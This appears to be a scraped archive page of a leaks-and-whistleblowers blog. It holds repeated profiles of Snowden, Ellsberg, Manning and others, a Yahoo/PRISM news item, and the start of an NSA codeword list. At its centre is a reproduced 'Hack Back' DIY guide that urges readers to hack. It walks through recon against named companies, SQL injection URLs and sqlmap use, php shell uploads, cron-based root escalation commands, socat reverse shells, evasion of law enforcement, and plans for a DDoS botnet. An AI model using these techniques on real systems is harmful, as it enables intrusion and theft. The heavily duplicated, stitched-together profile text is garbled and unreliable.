‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.

Daniel Ellsberg – Intelligence, Leaker

Dec 9, 2014 | Leaks, Whistleblowers & Dissidents

Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.

William Binney – Intelligence, Leaker

Dec 9, 2014 | Leaks, Whistleblowers & Dissidents

William Binney William Edward Binney is a former highly placed intelligence official with the United States National Security Agency turned whistleblower who resigned on October 31, 2001, after more than 30 years with the agency. We need more truthers like this guy. Without people coming forward we wil never have the kind of freedom of information that our founding fathers fought so hard for. Remember America is only as good as those who are willing to speak the truth.William Edward Binney is a former highly placed intelligence official with the United States National Security Agency turned whistleblower who resigned on October 31, 2001, after more than 30 years with the agency. We need more truthers like this guy. Without people coming forward we wil never have the kind of freedom of information that our founding fathers fought so hard for. Remember America is only as good as those who are willing to speak the truth.William Edward Binney is a former highly placed intelligence official with the United States National Security Agency turned whistleblower who resigned on October 31, 2001, after more than 30 years with the agency. We need more truthers like this guy. Without people coming forward we wil never have the kind of freedom of information that our founding fathers fought so hard for. Remember America is only as good as those who are willing to speak the truth.William Binney William Edward Binney is a former highly placed intelligence official with the United States National Security Agency turned whistleblower who resigned on October 31, 2001, after more than 30 years with the agency. We need more truthers like this guy. Without people coming forward we wil never have the kind of freedom of information that our founding fathers fought so hard for. Remember America is only as good as those who are willing to speak the truth.William Edward Binney is a former highly placed intelligence official with the United States National Security Agency turned whistleblower who resigned on October 31, 2001, after more than 30 years with the agency. We need more truthers like this guy. Without people coming forward we wil never have the kind of freedom of information that our founding fathers fought so hard for. Remember America is only as good as those who are willing to speak the truth.William Edward Binney is a former highly placed intelligence official with the United States National Security Agency turned whistleblower who resigned on October 31, 2001, after more than 30 years with the agency. We need more truthers like this guy. Without people coming forward we wil never have the kind of freedom of information that our founding fathers fought so hard for. Remember America is only as good as those who are willing to speak the truth.

Thomas Drake – Intelligence, Leaker

Dec 9, 2014 | Leaks, Whistleblowers & Dissidents

Thomas Drake is a former senior executive of the U.S. National Security Agency, a decorated United States Air Force and United States Navy veteran, and a whistleblower.is a former senior executive of the U.S. National Security Agency, a decorated United States Air Force and United States Navy veteran, and a whistleblower.is a former senior executive of the U.S. National Security Agency, a decorated United States Air Force and United States Navy veteran, and a whistleblower.is a former senior executive of the U.S. National Security Agency, a decorated United States Air Force and United States Navy veteran, and a whistleblower.

Thomas Andrews Drake is a former senior executive of the U.S. National Security Agency, a decorated United States Air Force and United States Navy veteran, and a whistleblower.is a former senior executive of the U.S. National Security Agency, a decorated United States Air Force and United States Navy veteran, and a whistleblower.is a former senior executive of the U.S. National Security Agency, a decorated United States Air Force and United States Navy veteran, and a whistleblower.is a former senior executive of the U.S. National Security Agency, a decorated United States Air Force and United States Navy veteran, and a whistleblower.

John Kiriakou – Intelligence, Leaker

Dec 9, 2014 | Leaks, Whistleblowers & Dissidents

John Kiriakou is a former CIA analyst and case officer, former senior investigator for the Senate Foreign Relations Committee, and former counterterrorism consultant for ABC News, blogger for Huffington Post, and author.former CIA analyst and case officer, former senior investigator for the Senate Foreign Relations Committee, and former counterterrorism consultant for ABC News, blogger for Huffington Post, and author.former CIA analyst and case officer, former senior investigator for the Senate Foreign Relations Committee, and former counterterrorism consultant for ABC News, blogger for Huffington Post, and author.former CIA analyst and case officer, former senior investigator for the Senate Foreign Relations Committee, and former counterterrorism consultant for ABC News, blogger for Huffington Post, and author.John Kiriakou is a former CIA analyst and case officer, former senior investigator for the Senate Foreign Relations Committee, and former counterterrorism consultant for ABC News, blogger for Huffington Post, and author.former CIA analyst and case officer, former senior investigator for the Senate Foreign Relations Committee, and former counterterrorism consultant for ABC News, blogger for Huffington Post, and author.former CIA analyst and case officer, former senior investigator for the Senate Foreign Relations Committee, and former counterterrorism consultant for ABC News, blogger for Huffington Post, and author.former CIA analyst and case officer, former senior investigator for the Senate Foreign Relations Committee, and former counterterrorism consultant for ABC News, blogger for Huffington Post, and author.

Jeremy Hammond – Hacker, Activst

Dec 9, 2014 | Anonymous, Leaks, Whistleblowers & Dissidents

Jeremy Hammond is a political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks. political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks. political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks.Jeremy Hammond is a political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks. political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks. political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks.Jeremy Hammond is a political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks. political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks. political activist and computer hacker from Chicago. He was convicted and sentenced in November 2013 to 10 years in US Federal Prison for hacking the private intelligence firm Stratfor and releasing the leaks through the whistleblowing website WikiLeaks.

Chelsea “Bradley” Manning – Military, Humanitarian

Dec 9, 2014 | Leaks, Whistleblowers & Dissidents

Chelsea “Bradley” Manning Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.Chelsea “Bradley” Manning Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.Chelsea “Bradley” Manning Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.Chelsea Elizabeth Manning is a United States Army soldier who was convicted in July 2013 of violations of the Espionage Act and other offenses, after releasing the largest set of classified documents ever leaked to the public.

Julian Assange – Hacker, Activist

Dec 9, 2014 | 2020 Relevant, Leaks, Whistleblowers & Dissidents

Julian Assange Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.Julian Assange Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.Julian Assange Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.Julian Paul Assange is an Australian publisher and journalist. He is known as the editor-in-chief of the website WikiLeaks, which he co-founded in 2006 after an earlier career in hacking and programming.

Edward Loomis – Intelligence, Leaker

Dec 9, 2014 | Leaks, Whistleblowers & Dissidents

Edward Loomis worked as an NSA cryptologist from 1964 to 2001. Prior to the 9/11 attacks, Loomis unsuccessfully lobbied the agency to adopt a sophisticated data-collection program — nicknamed “ThinThread” — to monitor foreign Internet traffic going through the United States. Loomis, who later became the target of a Justice Department investigation into leaks of classified data, told FRONTLINE that had ThinThread been in place before 9/11, the attacks may have been averted. He spoke to FRONTLINE’s Jim Gilmore and Mike Wiser on Dec. 12, 2013.worked as an NSA cryptologist from 1964 to 2001. Prior to the 9/11 attacks, Loomis unsuccessfully lobbied the agency to adopt a sophisticated data-collection program — nicknamed “ThinThread” — to monitor foreign Internet traffic going through the United States. Loomis, who later became the target of a Justice Department investigation into leaks of classified data, told FRONTLINE that had ThinThread been in place before 9/11, the attacks may have been averted. He spoke to FRONTLINE’s Jim Gilmore and Mike Wiser on Dec. 12, 2013.Edward Loomis worked as an NSA cryptologist from 1964 to 2001. Prior to the 9/11 attacks, Loomis unsuccessfully lobbied the agency to adopt a sophisticated data-collection program — nicknamed “ThinThread” — to monitor foreign Internet traffic going through the United States. Loomis, who later became the target of a Justice Department investigation into leaks of classified data, told FRONTLINE that had ThinThread been in place before 9/11, the attacks may have been averted. He spoke to FRONTLINE’s Jim Gilmore and Mike Wiser on Dec. 12, 2013.worked as an NSA cryptologist from 1964 to 2001. Prior to the 9/11 attacks, Loomis unsuccessfully lobbied the agency to adopt a sophisticated data-collection program — nicknamed “ThinThread” — to monitor foreign Internet traffic going through the United States. Loomis, who later became the target of a Justice Department investigation into leaks of classified data, told FRONTLINE that had ThinThread been in place before 9/11, the attacks may have been averted. He spoke to FRONTLINE’s Jim Gilmore and Mike Wiser on Dec. 12, 2013.Edward Loomis worked as an NSA cryptologist from 1964 to 2001. Prior to the 9/11 attacks, Loomis unsuccessfully lobbied the agency to adopt a sophisticated data-collection program — nicknamed “ThinThread” — to monitor foreign Internet traffic going through the United States. Loomis, who later became the target of a Justice Department investigation into leaks of classified data, told FRONTLINE that had ThinThread been in place before 9/11, the attacks may have been averted. He spoke to FRONTLINE’s Jim Gilmore and Mike Wiser on Dec. 12, 2013.worked as an NSA cryptologist from 1964 to 2001. Prior to the 9/11 attacks, Loomis unsuccessfully lobbied the agency to adopt a sophisticated data-collection program — nicknamed “ThinThread” — to monitor foreign Internet traffic going through the United States. Loomis, who later became the target of a Justice Department investigation into leaks of classified data, told FRONTLINE that had ThinThread been in place before 9/11, the attacks may have been averted. He spoke to FRONTLINE’s Jim Gilmore and Mike Wiser on Dec. 12, 2013.

Mordechai Vanunu aka John Crossman – Science, Nuclear

Dec 9, 2014 | Leaks, Whistleblowers & Dissidents

Mordechai Vanunu, also known as John Crossman, is a former Israeli nuclear technician who, citing his opposition to weapons of mass destruction, revealed details of Israel’s nuclear weapons program to the British press in 1986.

The NSA Was Going to Fine Yahoo $250K a Day If It Didn’t Join PRISM

Sep 21, 2014 | Abuses of Power, Black Technology, Leaks

When we first learned about NSA metadata collection, we wondered how readily the biggest tech companies acquiesced to the government. Today we start to find out. This is the story of how Yahoo was coerced into PRISM, as told by court documents cited by the Washington Post today.

According to the documents, corroborated by a blog post made public today by Yahoo—the U.S. government first approached the company in 2007 asking for user metadata. The request was unprecedented: The U.S. government was no longer interested in obtaining a court review before requesting metadata on an individual target. The order simply asked for data on targets located outside of the U.S. at the time, be they foreign or U.S. citizens.

Yahoo challenged the government requests several times, citing the limits of the U.S. Constitution, but was denied in the Foreign Intelligence Court of Review, the “secret courts” that oversee surveillance requests regarding national security. The repeated denials, plus the threat of losing $250,000 a day, forced Yahoo to comply with the NSA’s PRISM program.

For its part, the U.S. government used Yahoo as an example to coerce other American tech giants, sharing the rulings against Yahoo with companies like Google, Facebook, and Apple.

This information comes to light today, as roughly 1,500 pages of documents pertaining to Yahoo’s failed legal battle were released by Federal Judge William C. Bryson, who presides over the Foreign Intelligence Surveillance Court of Review. Yahoo requested the unsealing of the documents, and the company’s Ron Bell says in this blog post that Yahoo is working to make these never-before-released documents available on Tumblr.

Now that the courts are unsealing documents surrounding PRISM and other national surveillance programs, it’s possible that we’ll hear about other tech companies and whether they resisted the NSA’s requests for sweeping data dumps. Judging by what we’ve learned today, Yahoo tried to stick up for its users’ privacy—until it couldn’t afford to. [The Washington Post]

Hack Back: A DIY Guide for Those Without the Patience to Wait for Whistleblowers

Aug 15, 2014 | 2020 Relevant, Black Technology, Leaks

–[ 1 ]– Introduction

I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.

–[ 2 ]– Staying Safe

This is illegal, so you’ll need to take same basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
here.

[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix

As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.

–[ 3 ]– Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.

[0] http://ha.ckers.org/fierce/

For an example let’s take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com

Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 – 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd

Doing a whois lookup on academi.com reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.

Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com

If you repeat the whois lookups and such you’ll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com

…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

–[ 4 ]– Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like test.company.com or dev.company.com you’ll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.

6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.

[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/

For finsupport.finfisher.com the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
software.

* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:”Scripts/scripts.js.php”

* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”

But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:

* google allinurl:”Scripts/scripts.js.php” and find the other sites

* Notice they’re all sql injectable in the first url parameter I try.

* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
the option –tamper=’tamper/modsecurityversioned.py’

* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website’s source code.

[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/

Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
javascript, and if you’re unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.

[0] http://www.dvwa.co.uk/

Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap –file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!

–[ 5 ]– (fail at) Escalating

___________
< got r00t? >
———–
\ ^__^
\ (oo)\_______
(__)\ )\/\
||—-w |
|| ||
^^^^^^^^^^^^^^^^

Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].

[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/

finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ….nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.

–[ 6 ]– Pivoting

The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.

–[ 7 ]– Have Fun

Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!

–[ 8 ]– Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:

1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
hacker [0].

[0] https://www.youtube.com/watch?v=DB6ywr9fngU

–[ 9 ]– Resources

Links:

* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.

Books:

* The Web Application Hacker’s Handbook
* Hacking: The Art of Exploitation
* The Database Hacker’s Handbook
* The Art of Software Security Assessment
* A Bug Hunter’s Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

–[ 10 ]– Outro

You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

Raw List of NSA Nicknames and Codewords

May 19, 2014 | Abuses of Power, Black Technology, Leaks

Below is a listing of nicknames and codewords related to US Signals Intelligence (SIGINT) and Communications Security (COMSEC). Most of them are from the NSA, some are from other government or military agencies. Some of them also have an abbreviation which is shown in brackets.

NICKNAMES are generally unclassified. NSA uses single word nicknames, outside NSA they usually consist of two separate words, with the first word selected from alphabetical blocks that are assigned to different agencies by the Joint Staff. Usually, nicknames are printed using all capital letters.

CODEWORDS are always classified and always consist of a single word. Active codewords, or their three-letter abbreviations, which identify a classification compartment always need to be shown in the classification or banner line. Normally, codewords are printed using all capital letters.

Due to very strict secrecy, it’s not always clear whether we see a nickname or a codeword, but terms mentioned in public sources like job descriptions are of course unclassified nicknames.

Please keep in mind that a listing like this will always be work in progress (this list has been copied on some other websites and forums, but only this one is being updated frequently!).

See also the lists of Abbreviations and Acronyms and GCHQ Nicknames and Codewords

ACIDWASH – Covert access point for a mobile phone network in Afghanistan

ACORN – Retired SIGINT product codeword

